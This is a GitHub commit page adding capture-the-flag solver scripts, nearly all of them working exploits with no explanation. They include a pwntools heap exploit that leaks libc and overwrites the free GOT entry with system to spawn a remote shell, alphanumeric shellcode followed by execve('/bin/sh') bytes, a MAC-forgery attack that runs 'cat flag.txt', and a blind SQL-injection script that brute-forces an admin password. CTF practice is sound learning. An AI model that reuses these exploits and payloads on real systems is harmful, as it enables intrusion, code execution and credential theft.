Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
19 changed files
with
1,157 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,90 @@ | ||
from pwn import * | ||
context.log_level = 'DEBUG' | ||
|
||
e = ELF('./Cat') | ||
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') | ||
#p = process('./Cat') | ||
p = remote('178.62.40.102', 6000) | ||
|
||
def create(name, kind, age): | ||
p.sendline('1') | ||
p.recvuntil('> ') | ||
p.sendline(name) | ||
p.recvuntil('> ') | ||
p.sendline(kind) | ||
p.recvuntil('> ') | ||
p.sendline(str(age)) | ||
|
||
p.recvuntil('> ') | ||
|
||
def edit(i, name, kind, age, save): | ||
p.sendline('2') | ||
p.recvuntil('> ') | ||
p.sendline(str(i)) | ||
p.recvuntil('> ') | ||
p.sendline(name) | ||
p.recvuntil('> ') | ||
p.sendline(kind) | ||
p.recvuntil('> ') | ||
p.sendline(str(age)) | ||
p.recvuntil('> ') | ||
if save: | ||
p.sendline('y') | ||
else: | ||
p.sendline('n') | ||
|
||
|
||
def print_one(i): | ||
p.sendline('3') | ||
p.recvuntil('> ') | ||
p.sendline(str(i)) | ||
|
||
p.recvuntil(': ') | ||
name = p.recvline()[:-1] | ||
p.recvuntil(': ') | ||
t = p.recvline()[:-1] | ||
p.recvuntil(': ') | ||
age = p.recvline()[:-1] | ||
|
||
p.recvuntil('> ') | ||
|
||
return (name, t, age) | ||
|
||
def print_all(): | ||
p.sendline('4') | ||
stuff = p.recvuntil('print all:') | ||
|
||
p.recvuntil('> ') | ||
|
||
return stuff | ||
|
||
def delete(i): | ||
p.sendline('5') | ||
p.recvuntil('> ') | ||
p.sendline(str(i)) | ||
|
||
p.recvuntil('> ') | ||
|
||
p.recvuntil('> ') | ||
create("AAAA", "BBBB", 1) | ||
create("AAAA", "BBBB", 2) | ||
edit(1, "a", "b", 2, False) | ||
p.recvuntil('> ') | ||
create("CCCC", p64(e.got['putchar'] + 0x100), 2) | ||
edit(0, "EEEEEEEE", "F"*0x10 + p64(e.got['puts'])[:5], 2, True) | ||
p.recvuntil('> ') | ||
|
||
puts_libc, _, _ = print_one(2) | ||
puts_libc = u64(puts_libc.ljust(8, '\x00')) | ||
libc.address = puts_libc - libc.symbols['puts'] | ||
|
||
print hex(libc.address) | ||
|
||
create("/bin/sh", "BBBB", 1) | ||
create("/bin/sh", "BBBB", 2) | ||
edit(4, "a", "b", 2, False) | ||
p.recvuntil('> ') | ||
create("CCCC", p64(e.got['free']), 2) | ||
edit(3, p64(libc.symbols['system']), "FFFF", 2, True) | ||
|
||
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
#!/usr/bin/env python | ||
from pwn import * | ||
import hashlib | ||
import itertools | ||
import numpy as np | ||
|
||
context.log_level = "debug" | ||
p = remote("37.139.22.174", 11740) | ||
p.recvuntil("Submit") | ||
ln = p.recvn(len("a printable string X, such that sha256(X)[-6:] = 10d36290")) | ||
brute_str = ln.split(" = ")[-1].strip() | ||
print(brute_str) | ||
|
||
def brute(): | ||
for count in range(1,126): | ||
for i in itertools.combinations(range(32, 126), count): | ||
string = "".join(map(chr,i)) | ||
sha = hashlib.sha256(bytes(string)) | ||
if sha.hexdigest()[-6:] == brute_str: | ||
print(string) | ||
return string | ||
|
||
p.sendline(brute()) | ||
p.recvline() | ||
p.recvline() | ||
|
||
n = int(p.recvline().split(" = ")[-1].strip()) | ||
#p.interactive() | ||
|
||
def pcomp(n): | ||
p2 = 1; | ||
i = 0; | ||
while( p2 < n ): | ||
p2 = np.left_shift(p2, 2); | ||
i = np.add(i, 2); | ||
|
||
p2= np.right_shift(p2, 2); | ||
i = np.subtract(i, 2); | ||
p2 = np.right_shift(p2, i/2) | ||
return p2 | ||
|
||
|
||
def squareLowerThan(n): | ||
p = pcomp(n) | ||
p2 = np.square(p) | ||
d = 1; | ||
while( p2 + np.multiply(2,p) + d < n ): | ||
p2 = np.add(p2, np.multiply(2,p) + d); | ||
d = np.add(d, 2); | ||
return p2; | ||
|
||
ans = squareLowerThan(n) | ||
print(ans) | ||
p.sendline(str(ans)) | ||
print p.recvall() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,66 @@ | ||
from pwn import * | ||
|
||
p = process('./magic') | ||
#p = remote('magic.420blaze.in', 420) | ||
|
||
asm_s = "" | ||
asm_s += "dec esp;" * 4 | ||
asm_s += "pop ebx;" # ebx = 0 | ||
asm_s += "push ebx; pop eax;" # eax = 0 | ||
asm_s += "inc eax;" * 3 # eax = 3 for sys_read | ||
|
||
asm_s += """ | ||
push esp; | ||
inc esp; | ||
pop ecx; | ||
""" | ||
asm_s += "push ecx; pop ebp;" # ebp = 0x61313375 | ||
# shift 0x61313375 -> 0x61313370 | ||
asm_s += "dec ecx;" * 5 | ||
# shift 0x61313375 -> 0x61313380 | ||
asm_s += "inc ebp;" * (0x80-0x75) | ||
asm_s += """ | ||
push ecx; | ||
dec esp; | ||
""" | ||
asm_s += "pop esp;" | ||
|
||
# esp = 0x31337050 | ||
|
||
# 0x31337000: 0xbc 0x00 0x71 0x33 0x31 0x61 0x8b 0x25 | ||
# 0x31337008: 0x20 0x71 0x33 0x31 0x54 0x89 0x25 0x20 | ||
# 0x31337010: 0x71 0x33 0x31 0xbc 0x20 0x71 0x33 0x31 | ||
# 0x31337018: 0x60 0xe9 0x6d 0x16 0xd1 0xd6 0x00 0x00 | ||
|
||
# shift stack from 0x31337050 -> 0x31337024 | ||
asm_s += "push ebx;" * ((0x50-0x24) / 4) | ||
|
||
asm_s += "push esp; pop ecx;" # ecx = 0x024 | ||
asm_s += "dec ecx;" * 4 # ecx = 0x020 | ||
|
||
asm_s += "push ebx;" # sp = 0x020 | ||
asm_s += "dec esp;" * 4 # 020 -> 01c | ||
asm_s += "pop edi;" # eax = 0xd6d1 | ||
asm_s += "dec edi;" * (0xd1-0xcd) # eax=0xcd, esp=0x31337020 | ||
asm_s += "inc esp;" * 2 # esp=0x22 | ||
asm_s += "push edi;" # set *0x3133701e=0xcd | ||
asm_s += "pop edi;" | ||
asm_s += "inc esp;" | ||
asm_s += "push ebp;" | ||
asm_s += "dec esp;" | ||
|
||
asm_s += "push ebx;" # overwrite jump target | ||
|
||
|
||
stuff = asm(asm_s) | ||
|
||
print(stuff) | ||
print(len(stuff)) | ||
|
||
p.sendline(stuff) | ||
sleep(1) | ||
p.sendline("\x31\xc0\x50\x68\x2f\x2f\x73" | ||
"\x68\x68\x2f\x62\x69\x6e\x89" | ||
"\xe3\x89\xc1\x89\xc2\xb0\x0b" | ||
"\xcd\x80\x31\xc0\x40\xcd\x80") | ||
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
from pwn import * | ||
import subprocess | ||
|
||
e = ELF('./magic') | ||
|
||
regs = ['EDI', 'ESI', 'EBP', 'ESP', 'EBX', 'EDX', 'ECX', 'EAX'] | ||
|
||
last_msg = "AAAABAAACAAADAAAEAAAFAAAGAAAHAAA" | ||
|
||
out = "pop ESI;" | ||
|
||
for i in range(1, 48): | ||
stack = e.string(e.u32(e.symbols['r'] + (i*8 - 4))) | ||
msg = e.string(e.u32(e.symbols['r'] + (i*8))) | ||
next_stack = e.string(e.u32(e.symbols['r'] + (i*8 + 4))) | ||
|
||
# pushes don't modify msg | ||
if len(next_stack) > len(stack): | ||
pushed_val = next_stack[:4] | ||
idx = msg.find(pushed_val) | ||
if idx == -1: | ||
idx = 3 # ESP | ||
else: | ||
assert idx % 4 == 0 | ||
idx /= 4 | ||
out += "push "+regs[idx]+";" | ||
continue | ||
|
||
for j in range(0, 8*4, 4): | ||
if msg[j:j+4] != last_msg[j:j+4]: | ||
reg = regs[j/4] | ||
op = "" | ||
|
||
if len(next_stack) < len(stack): | ||
op = "pop "+reg+";" | ||
else: | ||
old_val = u32(last_msg[j:j+4]) | ||
new_val = u32(msg[j:j+4]) | ||
if new_val < old_val: | ||
op = "dec "+reg+";" | ||
else: | ||
op = "inc "+reg+";" | ||
|
||
last_msg = msg | ||
out += op | ||
break | ||
else: | ||
print hex(e.symbols['r'] + (i*8)) | ||
|
||
stuff = subprocess.check_output(['rasm2', '-b', '32', out]) | ||
print stuff.strip().decode('hex') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
import requests | ||
|
||
flag = [''] * 0x100 | ||
|
||
for i in range(0x100, 0x3986): | ||
j = requests.post("http://something.420blaze.in:8545/", data='{"jsonrpc":"2.0","method":"eth_getBlockByNumber","params":["'+hex(i)+'", true],"id":1}', headers={"Content-Type": "application/json"}).json() | ||
for tx in j['result']['transactions']: | ||
func = tx['input'][2:10] | ||
arg1 = tx['input'][10:10+64] | ||
arg2 = tx['input'][74:74+64] | ||
arg3 = tx['input'][74+64:202] | ||
arg4 = tx['input'][202:].decode('hex').rstrip('\x00') | ||
if func == 'd1d13ebf': | ||
idx = int(arg1[-2:], 16) | ||
char = arg4[-1] | ||
flag[idx] = char | ||
print(flag) | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,45 @@ | ||
from pwn import * | ||
|
||
r = remote('macsh.chal.pwning.xxx', 64791) | ||
r.recvuntil('> ') | ||
|
||
ls_blk = 'echo AAAAAAAAAAA' | ||
len_blk = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10' | ||
pad_blk = '\x10'*16 | ||
a_blk = 'A'*16 | ||
|
||
entered_len_blk = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00' | ||
|
||
m1 = entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3)) | ||
m1+= ls_blk + len_blk + a_blk + (a_blk*(16*8 - 3)) | ||
|
||
r.sendline('<|>tag '+ls_blk) | ||
echo_len_pad = r.recvline().strip().decode('hex') | ||
print(echo_len_pad) | ||
r.recvuntil('> ') | ||
|
||
r.sendline('<|>tag '+m1) | ||
echo_len = r.recvline().strip().decode('hex') | ||
print(echo_len) | ||
r.recvuntil('> ') | ||
|
||
def xor(x,y): | ||
return ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y)) | ||
|
||
pad = xor(echo_len_pad, echo_len) | ||
|
||
ls_blk = 'cat ././flag.txt' | ||
|
||
m1 = entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3)) | ||
m1+= ls_blk + len_blk + a_blk + (a_blk*(16*8 - 3)) | ||
|
||
r.sendline('<|>tag '+m1) | ||
ls_len = r.recvline().strip().decode('hex') | ||
print(ls_len) | ||
r.recvuntil('> ') | ||
|
||
ls_len_pad = xor(ls_len, pad) | ||
print(ls_len_pad) | ||
r.sendline(ls_len_pad.encode('hex') + '<|>' + ls_blk) | ||
|
||
r.interactive() |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
import requests, string | ||
|
||
passwd = "" | ||
|
||
for i in range(32): | ||
for c in string.hexdigits: | ||
q = "' UNION SELECT '83d069f7e011dc75b7c98e1c589c059d' FROM users WHERE username='admin' AND password LIKE '{}%'; -- " | ||
q = q.format(passwd + c) | ||
x = requests.post("http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi?", data={ | ||
'user': q, | ||
'pass': 'foo', | ||
'login': 'Login' | ||
}) | ||
if 'menu.cgi' in x.text: | ||
passwd += c | ||
print passwd | ||
break | ||
else: | ||
print 'asdf' | ||
|
Oops, something went wrong.